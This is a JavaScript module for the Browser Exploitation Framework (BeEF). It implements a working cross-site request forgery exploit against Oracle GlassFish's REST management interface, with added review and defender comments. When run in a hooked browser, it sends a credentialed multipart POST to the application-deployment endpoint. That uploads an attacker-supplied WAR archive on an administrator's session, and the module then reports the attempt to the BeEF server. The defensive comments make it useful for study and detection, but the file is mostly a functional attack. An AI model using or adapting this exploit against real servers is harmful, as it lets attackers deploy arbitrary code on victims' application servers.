//
// Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//


//   This exploit is based on the PoC by Roberto Suggi Liverani - Security-Assessment.com
//   For more info, refer to: http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html


beef.execute(function() {
  // These three values are filled in server-side by the module's ERB template
  // before the script is delivered to the hooked browser.
  // NOTE(review): they are interpolated raw into single-quoted JS literals, so a
  // value containing a quote or newline would break the script. Presumably the
  // module validates them before rendering; confirm.
  var restHost = '<%= @restHost %>';   // base URL of the target REST management interface
  var warName = '<%= @warName %>';     // file name sent in the multipart file part
  var warBase = '<%= @warBase %>';     // base64-encoded archive contents (decoded with atob below)

  // Application-deployment endpoint of the REST management API.
  // Defender note: a cross-site POST to this path, i.e. one whose Origin or
  // Referer is not the admin console itself, is the request to alert on.
  var logUrl = restHost.concat('/management/domain/applications/application');


  // Polyfill for the non-standard XMLHttpRequest#sendAsBinary, installed only
  // when the browser lacks it. It takes a "binary string" (one character per
  // byte), keeps the low 8 bits of each UTF-16 code unit, and sends the
  // resulting bytes as an ArrayBuffer so they are not re-encoded as UTF-8.
  if (typeof XMLHttpRequest.prototype.sendAsBinary === 'undefined' && Uint8Array) {
    XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
      var total = datastr.length;
      var octets = new Uint8Array(total);
      for (var pos = 0; pos < total; pos++) {
        octets[pos] = datastr.charCodeAt(pos) & 0xff;
      }
      this.send(octets.buffer);
    };
  }

  /**
   * Builds a multipart/form-data body (option fields plus one file part) and
   * POSTs it to logUrl with the browser's ambient credentials attached.
   * Reports back through beef.net.send once the request reaches readyState 4.
   *
   * Defender notes:
   *  - multipart/form-data is a content type browsers send cross-origin without
   *    a CORS preflight, so the server cannot rely on CORS to block this request.
   *    It has to require an anti-CSRF token or a custom request header (or check
   *    Origin) on state-changing calls to the management API.
   *  - The boundary below is a fixed string, so it appears verbatim in the
   *    Content-Type header of every request this script sends. That makes it a
   *    usable static detection signature for proxy or WAF rules.
   *
   * @param {string} fileData base64-encoded file contents (decoded in addFileField)
   * @param {string} fileName name placed in the file part's filename attribute
   * @returns {boolean} always true; the outcome of the request is not reflected
   */
  function fileUpload(fileData, fileName) { 
    // NOTE(review): boundary, uri and xhr are assigned without a declaration
    // keyword, so in sloppy mode they become implicit globals on the page
    // (and this statement would throw in strict mode).
    boundary = "HELLOWORLD270883142628617", 
    uri = logUrl, 
    xhr = new XMLHttpRequest(); 
 
    // Option fields sent as ordinary form parts ahead of the file part.
    // Presumably they mirror the admin console's deploy form; confirm against
    // the write-up referenced in the file header.
    var additionalFields = { 
      asyncreplication: "true", 
      availabilityenabled: "false", 
      contextroot: "", 
      createtables: "true", 
      dbvendorname: "", 
      deploymentplan: "", 
      description: "", 
      dropandcreatetables: "true", 
      enabled: "true", 
      force: "false", 
      generatermistubs: "false", 
      isredeploy: "false", 
      keepfailedstubs: "false", 
      keepreposdir: "false", 
      keepstate: "true", 
      lbenabled: "true", 
      libraries: "", 
      logReportedErrors: "true", 
      name: "", 
      precompilejsp: "false", 
      properties: "", 
      property: "", 
      retrieve: "", 
      target: "", 
      type: "", 
      uniquetablenames: "true", 
      verify: "false", 
      virtualservers: "", 
      __remove_empty_entries__: "true" 
    }

 
    // Form field name that carries the uploaded file.
    var fileFieldName = "id"; 
    xhr.open("POST", uri, true); 
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request.
    // Attach cookies / HTTP auth for the target origin. This is what makes the
    // request ride on an administrator's existing session.
    // NOTE(review): a string is assigned where the API expects a boolean; it is
    // truthy, so credentials are still sent.
    xhr.withCredentials = "true"; 
    xhr.onreadystatechange = function() { 
      // readyState 4 means the request finished. The HTTP status is not checked,
      // so the message reports that the attempt completed, not that it succeeded.
      if (xhr.readyState == 4) {
	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Attempt to deploy \"' + warName + '\" completed.'); 
      } 
    } 
      
    var body = ""; 
      
    // Serialise each own property of additionalFields as a form-data part.
    for (var i in additionalFields) { 
      if (additionalFields.hasOwnProperty(i)) { 
        body += addField(i, additionalFields[i], boundary); 
      } 
    } 
  
    body += addFileField(fileFieldName, fileData, fileName, boundary); 
    // Closing delimiter of the multipart body.
    body += "--" + boundary + "--";
    // NOTE(review): Content-Length is a forbidden request header name; browsers
    // ignore this call and compute the length themselves.
    xhr.setRequestHeader('Content-length', body.length); 
    // Sent as raw bytes so the decoded file contents are not re-encoded.
    xhr.sendAsBinary(body);
    return true; 
  } 
  
  /**
   * Serialises one plain form field as a multipart/form-data part.
   * name and value are inserted as-is, with no quoting or escaping.
   *
   * @param {string} name form field name
   * @param {string} value form field value
   * @param {string} boundary multipart boundary, without the leading "--"
   * @returns {string} the part: delimiter line, headers, blank line, value, CRLF
   */
  function addField(name, value, boundary) {
    var delimiterLine = "--" + boundary + "\r\n";
    var dispositionHeader = 'Content-Disposition: form-data; name="' + name + '"\r\n\r\n';
    var payload = value + "\r\n";
    return delimiterLine + dispositionHeader + payload;
  }
  
  /**
   * Serialises one file upload as a multipart/form-data part with a
   * Content-Type of application/octet-stream.
   * name and filename are inserted into the header as-is, with no escaping.
   *
   * @param {string} name form field name
   * @param {string} value base64-encoded file contents
   * @param {string} filename value for the filename attribute
   * @param {string} boundary multipart boundary, without the leading "--"
   * @returns {string} the part, with the file contents as a binary string
   */
  function addFileField(name, value, filename, boundary) {
    var headers = "--" + boundary + "\r\n" +
      'Content-Disposition: form-data; name="' + name + '"; filename="' + filename + '"\r\n' +
      "Content-Type: application/octet-stream\r\n\r\n";

    // atob yields one character per decoded byte; the sender later masks each
    // character to 8 bits before transmission.
    var decoded = atob(value);

    return headers + decoded + "\r\n";
  }
  
  
  // Entry point: sends the template-supplied archive (warBase, base64) under
  // the template-supplied file name (warName) in a single upload request.
  function start() {
    fileUpload(warBase, warName);
  }

  // Runs once, as soon as the hooked browser executes this module.
  start();

});

